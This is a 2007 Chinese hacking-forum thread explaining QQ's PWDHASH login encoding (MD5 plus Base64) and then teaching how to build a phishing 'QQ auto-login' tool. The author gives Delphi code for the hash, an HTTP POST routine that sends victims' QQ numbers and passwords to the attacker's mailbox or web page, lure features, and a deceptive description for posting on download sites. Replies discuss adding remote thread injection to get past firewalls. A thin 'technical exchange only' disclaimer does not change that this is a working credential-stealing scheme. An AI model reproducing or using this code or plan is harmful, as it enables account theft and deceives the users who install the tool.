‹‹ 上一主题 | 下一主题 ››
 31 12
发新话题
打印

[原创]探密QQ登陆加密算法兼谈简单打造一个QQ钓鱼工程

zshoucheng

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
239 
精华
12 
积分
6049 
阅读权限
100 
性别
男 
来自
gd 
在线时间
1270 小时 
注册时间
2006-5-19 
最后登录
2008-10-9 
楼主 发表于 2007-6-6 11:33  只看该作者

[原创]探密QQ登陆加密算法兼谈简单打造一个QQ钓鱼工程

文章作者:zshoucheng
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

转载请保持文章完整性

1.QQ登陆加密算法

QQ命令行启动方式:
引用:
QQ.exe /START QQUIN:QQ号码 PWDHASH:加密后的QQ密码 /STAT:登陆状态(40隐身,41正常)
其中PWDhash 原本是为实现 QQ 与 TM无缝切换而用的将密码加密传递的参数。使得用户能在 QQ 与 TM 之间快速切换而不用再次输入密码。

PWDHASH就是对我们的原始QQ密码进行MD5散列算法处理,得到一个16字节的MD5 HASH 字节组,然后再用BASE64编码对这个HASH字节组做第二次编码得到的。理论上说是无法从PWDHASH反推出原始的QQ密码的。但是,如果密码过于简单,如纯数字之类的,是可能被简单暴力破解的。

下面以Delphi代码讲解,附件中有Delphi的实现单元和相应的C#类,目的是让大家能够选择自己喜欢的编程语言实现

获取QQ命令行启动参数函数:(参数:QQ号码、QQ密码、登陆状态)
Code Language : Delphi
  1. function GetCommandLine(QQNum, QQPw: string; QQState: integer): string;
  2. type
  3.  TempChar = array[0..15] of char;
  4. var
  5.  md5: TIdHashMessageDigest5;
  6. begin
  7.  md5 := TIdHashMessageDigest5.Create;
  8.  result := ' /START QQUIN:' + QQNum + ' PWDHASH:' + Base64(TempChar(md5.HashValue(QQPw))) + ' /STAT:' + IntToStr(QQState);
  9.  md5.Free;
  10. end;
Parsed in 0.009 seconds
上面函数用到的Base64函数为:
Code Language : Delphi
  1. function Base64(Src: string): string;
  2. const
  3.  DataSet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
  4. var
  5.  i, ModLen: integer;
  6.  Current: string;
  7.  Buf: array[1..3] of Byte;
  8.  NewBuf: array[1..4] of Byte;
  9. begin
  10.  result := '';
  11.  if Src = '' then
  12.   exit;
  13.  ModLen := Length(Src) mod 3;
  14.  while Length(Src) > 0 do
  15.  begin
  16.   FillChar(Buf, 3, #0);
  17.   Current := Copy(Src, 1, 3);
  18.   Src := Copy(Src, 4, Length(Src) - 3);
  19.   for i := 1 to 3 do
  20.    Buf[i] := Ord(Current[i]);
  21.   NewBuf[1] := Buf[1] shr 2;
  22.   NewBuf[2] := (Buf[1] shl 6 shr 2 or Buf[2] shr 4) and $3F;
  23.   NewBuf[3] := (Buf[2] shl 4 shr 2 or Buf[3] shr 6) and $3F;
  24.   NewBuf[4] := Buf[3] and $3F;
  25.   for i := 1 to 4 do
  26.    result := result + DataSet[NewBuf[i] + 1];
  27.  end;
  28.  if ModLen >= 1 then
  29.   result[Length(result)] := '=';
  30.  if ModLen = 1 then
  31.   result[Length(result) - 1] := '=';
  32. end;
Parsed in 0.022 seconds
这样就可以实现从命令行直接登陆QQ了。

另外我们还要获取QQ的安装路径:
在注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\TENCENT\PLATFORM_TYPE_LIST 下面有几个子键,1中的 TypePath 的键值为 QQ 的安装路径,2中的 TypePath 的键值为 TM 的安装路径。我们就可以通过读取注册表来获取QQ的安装路径了(其实现比较简单,请参见源码)。

2.简单打造QQ钓鱼工程

有了上面的QQ自动登陆的实现,我们就可以写出一个QQ自动登陆器了。这就和我要说的QQ钓鱼工程联系上了,聪明的你一定也想出来了。
编写一款优秀的QQ木马去截获QQ密码框中的密码对我等小菜来说难以实现,但我们却可以变相地去获取QQ密码:
当别人使用我们的QQ自动登陆器登陆QQ时,我们可以把他所输入的QQ以及密码发送到我们的邮箱或指定网页上,这里给出ASP发信的代码:
Code Language : Delphi
  1. function HtmlEncode(s: string): string;
  2. var
  3.  i, v1, v2: integer;
  4.  function i2s(b: byte): char;
  5.  begin
  6.   if b <= 9 then result := chr($30 + b)
  7.   else result := chr($41 - 10 + b);
  8.  end;
  9. begin
  10.  result := '';
  11.  for i := 1 to length(s) do
  12.   if s[i] = ' ' then result := result + '+'
  13.   else if (s[i] < ' ') or (s[i] in ['/', '\', ':', '&', '?', '|']) then
  14.   begin
  15.    v1 := ord(s[i]) mod 16;
  16.    v2 := ord(s[i]) div 16;
  17.    result := result + '%' + i2s(v2) + i2s(v1);
  18.   end
  19.   else result := result + s[i];
  20. end;
  21.  
  22. function UpperCase(AStr: string): string; overload;
  23. var
  24.  LI: Integer;
  25. begin
  26.  Result := AStr;
  27.  for LI := 1 to Length(Result) do
  28.   Result[LI] := UpCase(Result[LI]);
  29. end;
  30.  
  31. // 以Post方式发信
  32. function PostURL(const aUrl: string; FTPostQuery: string; const strPostOkResult: string = 'Send OK!'): Boolean;
  33. var
  34.  hSession: HINTERNET;
  35.  hConnect, hRequest: hInternet;
  36.  lpBuffer: array[0..1024 + 1] of Char;
  37.  dwBytesRead: DWORD;
  38.  HttpStr: string;
  39.  HostName, FileName: string;
  40.  FTResult: Boolean;
  41.  AcceptType: LPStr;
  42.  Buf: Pointer;
  43.  dwBufLen, dwIndex: DWord;
  44.  procedure ParseURL(URL: string; var HostName, FileName: string);
  45.   procedure ReplaceChar(c1, c2: Char; var St: string);
  46.   var
  47.    p: Integer;
  48.   begin
  49.    while True do
  50.    begin
  51.     p := Pos(c1, St);
  52.     if p = 0 then Break
  53.     else St[p] := c2;
  54.    end;
  55.   end;
  56.  var
  57.   i: Integer;
  58.  begin
  59.   if Pos(UpperCase('http://'), UpperCase(URL)) <> 0 then
  60.    System.Delete(URL, 1, 7);
  61.   i := Pos('/', URL);
  62.   HostName := Copy(URL, 1, i);
  63.   FileName := Copy(URL, i, Length(URL) - i + 1);
  64.   if (Length(HostName) > 0) and (HostName[Length(HostName)] = '/') then
  65.    SetLength(HostName, Length(HostName) - 1);
  66.  end;
  67. begin
  68.  Result := False;
  69.  hSession := InternetOpen('MyApp', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
  70.  try
  71.   if Assigned(hSession) then
  72.   begin
  73.    ParseURL(aUrl, HostName, FileName);
  74.    hConnect := InternetConnect(hSession, PChar(HostName),
  75.    INTERNET_DEFAULT_HTTP_PORT, nil, nil, INTERNET_SERVICE_HTTP, 0, 0);
  76.    AcceptType := PChar('Accept: */*');
  77.    hRequest := HttpOpenRequest(hConnect, 'POST', PChar(FileName), 'HTTP/1.0',
  78.     nil, @AcceptType, INTERNET_FLAG_RELOAD, 0);
  79.    HttpSendRequest(hRequest, 'Content-Type: application/x-www-form-urlencoded', 47,
  80.     PChar(FTPostQuery), Length(FTPostQuery));
  81.    dwIndex := 0;
  82.    dwBufLen := 1024;
  83.    GetMem(Buf, dwBufLen);
  84.    FTResult := HttpQueryInfo(hRequest, HTTP_QUERY_CONTENT_LENGTH,
  85.     Buf, dwBufLen, dwIndex);
  86.    if FTResult = True then
  87.    try
  88.     while True do
  89.     begin
  90.      dwBytesRead := 1024;
  91.      InternetReadFile(hRequest, @lpBuffer, 1024, dwBytesRead);
  92.      if dwBytesRead = 0 then break;
  93.      lpBuffer[dwBytesRead] := #0;
  94.      HttpStr := HttpStr + lpBuffer;
  95.     end;
  96.     Result := pos(strPostOkResult, HttpStr) > 0;
  97.    finally
  98.     InternetCloseHandle(hRequest);
  99.     InternetCloseHandle(hConnect);
  100.    end;
  101.   end;
  102.  finally
  103.   InternetCloseHandle(hSession);
  104.  end;
  105. end;
Parsed in 0.071 seconds
我们可以给我们的QQ自动登陆器加多些功能,以吸引别人使用(钓鱼嘛~),比如:

QQ性别任意修改:
Code Language : Delphi
  1. procedure ChangeSex(sex:string);
  2. var
  3.  tmp:pchar;
  4.  h,h1,h2,h3,h4,h5:HWND;
  5.  id:integer;
  6. begin
  7. h := FindWindow('#32770','QQ2007设置');
  8. if h=0 then
  9. h := FindWindow('#32770','QQ2006设置');
  10. if h<>0 then begin
  11. h1 := FindWindowEx(h,0,'#32770',nil);
  12. h2 := FindWindowEx(h1,0,'#32770',nil);
  13. h3 := GetDlgItem(h2,1356);
  14. h4 := GetDlgItem(h2,551);
  15. h5 := GetDlgItem(h1,1343);
  16. SendMessage(h3,32,0,0); //WM_SETCURSOR
  17. id := SendMessage(h3,323,0,longint(pchar(sex))); //给QQ性别组合框加一项
  18. SendMessage(h3,334,id,0); //选择所加的那项
  19. SendMessage(h4,13,10,longint(@tmp));
  20. SendMessage(h4,12,0,longint(@tmp));
  21. SendMessage(h5,245,0,0); //点击确定按钮
  22. end
  23. else
  24. Application.MessageBox('请先打开QQ个人设置窗口!','提示',MB_OK);
  25. end;
Parsed in 0.021 seconds
QQ强行聊天:
Code Language : Delphi
  1. procedure QQChat(number:string);
  2. var
  3. inum:integer;
  4. begin
  5. if trystrtoint(number,inum) then
  6.  begin
  7.   if inum>10000 then
  8.   ShellExecute(handle,nil,pchar('Tencent://Message/?Menu=YES&Exe=&Uin='+number),nil,nil,SW_NORMAL)
  9.   else
  10.   Application.MessageBox('无此QQ号码!','提示',MB_OK);
  11.  end
  12. else
  13. Application.MessageBox('请输入有效的QQ号码!','提示',MB_OK);
  14. end;
Parsed in 0.010 seconds
这些功能的实现都是再简单不过了,但对于不懂编程的人来说却觉得很神奇(我给我身边的同学、朋友用的时候他们都崇拜地对我说:你太厉害了!而我,背后暗笑中……)

程序最终效果如图:

到这里我们的QQ钓鱼工程就快完成了,我们可以写个使用说明,使用点社会工程学技巧:
引用:
程序功能:
1.自动登陆
能有效防止所有的QQ盗号木马,因为QQ盗号木马是通过截获QQ登陆窗口实现盗号的
使用本软件登陆QQ,即使你中了QQ木马,你的QQ也不会被盗

2.QQ性别任意修改
可以将你QQ性别修改为任意的(你的QQ好友查看你的QQ资料时即可看到效果)

3.强行聊天
能和任意QQ号码聊天,无须添加对方为好友
……
然后发到国内一些下载站上去,或者在一些论坛宣传……你就等着收QQ吧!

郑重声明:本文旨在技术交流,其中介绍的技术仅供测试,非法盗取他人帐号是违法的。对使用本文所介绍的技术引起的任何法律问题与本人无关!

附件

QQ_Src.rar (2 KB)

2007-6-6 11:33, 下载次数: 207

--->  伱 能 領 導 潮 流.  我 可 領 導 全 賕!  <---

TOP

黯魂

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
273 
精华
4 
积分
4000 
阅读权限
100 
性别
男 
在线时间
67 小时 
注册时间
2007-1-12 
最后登录
2008-9-27 
沙发 发表于 2007-6-6 11:38  只看该作者
不错的思路,不过我开始怀疑以前用的自动登陆器是否足够安全可信了。。

TOP

ljh1021

晶莹剔透§烈日灼然

Rank: 1

帖子
16 
精华
0 
积分
58 
阅读权限
40 
性别
男 
来自
重庆 
在线时间
12 小时 
注册时间
2007-4-21 
最后登录
2008-5-5 
椅子 发表于 2007-6-6 15:10  只看该作者
LZ没使用远程线程注入,这样的话穿墙性不太好吧

TOP

zshoucheng

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
239 
精华
12 
积分
6049 
阅读权限
100 
性别
男 
来自
gd 
在线时间
1270 小时 
注册时间
2006-5-19 
最后登录
2008-10-9 
板凳 发表于 2007-6-6 18:24  只看该作者
引用:
引用第2楼ljh1021于2007-06-06 15:10发表的 :
LZ没使用远程线程注入,这样的话穿墙性不太好吧
本文提供的是思路
RemoteThread Inject 技术现在更是遍地开花,想使用此技术就自己加吧
--->  伱 能 領 導 潮 流.  我 可 領 導 全 賕!  <---

TOP

cncxz

晶莹剔透§烈日灼然

Rank: 1

帖子
48 
精华
0 
积分
167 
阅读权限
40 
在线时间
53 小时 
注册时间
2007-1-27 
最后登录
2008-10-11 
地板 发表于 2007-6-6 23:15  只看该作者
引用:
引用第2楼ljh1021于2007-06-06 15:10发表的 :
LZ没使用远程线程注入,这样的话穿墙性不太好吧
这里本身就是用户自己填写QQ号码QQ密码然后登陆的,属于本机对外连接,外部无须发送任何数据到本地,防火墙在这里基本不起任何作用..估计没有多少个BT的QQ用户把自己的防火墙对外连接都锁死吧?而且要用登陆器登陆QQ,防火墙本身就必须对登陆器放行..
Http://Www.CnCxz.Cn/

TOP

mingjian987

蓝色血

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
148 
精华
0 
积分
3503 
阅读权限
100 
性别
男 
在线时间
65 小时 
注册时间
2006-9-8 
最后登录
2008-9-29 
6楼 发表于 2007-6-7 07:46  只看该作者
呵呵..很久以前好象这个思路就有.不过没人做出具体的代码..
感谢下楼主先
然后请问下楼主 既然有截获方法那是否有预防截获的呢?
start D:\QQ\qq.exe /START QQUIN:364049559 PWDHASH:****== /START40 PROXY:UUQBAQEABREAg7GAoIuavYuamoeAibqXnosEAAAAAQAAAA==
这个东西我们是逃不掉的.那我们该怎么办呢?

TOP

ljh1021

晶莹剔透§烈日灼然

Rank: 1

帖子
16 
精华
0 
积分
58 
阅读权限
40 
性别
男 
来自
重庆 
在线时间
12 小时 
注册时间
2007-4-21 
最后登录
2008-5-5 
7楼 发表于 2007-6-7 21:01  只看该作者
引用:
引用第4楼cncxz于2007-06-06 23:15发表的 :


这里本身就是用户自己填写QQ号码QQ密码然后登陆的,属于本机对外连接,外部无须发送任何数据到本地,防火墙在这里基本不起任何作用..估计没有多少个BT的QQ用户把自己的防火墙对外连接都锁死吧?而且要用登陆器登陆QQ,防火墙本身就必须对登陆器放行..
对外连接的是QQ.EXE,登陆器只是完成那段密码的计算过程,所以还是要考虑穿墙滴

TOP

fhod

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
907 
精华
16 
积分
6886 
阅读权限
150 
性别
男 
在线时间
537 小时 
注册时间
2004-12-6 
最后登录
2008-10-12 
8楼 发表于 2007-6-7 21:52  只看该作者
我以前也想过QQ登陆钓鱼的
VB加asp来实现
用VB写个跟QQ一样的登陆界面(有点难)..登陆提交到asp页面..后台接受..然后在调用真正的QQ文件..
不过没楼主的方法好
赞一个.

TOP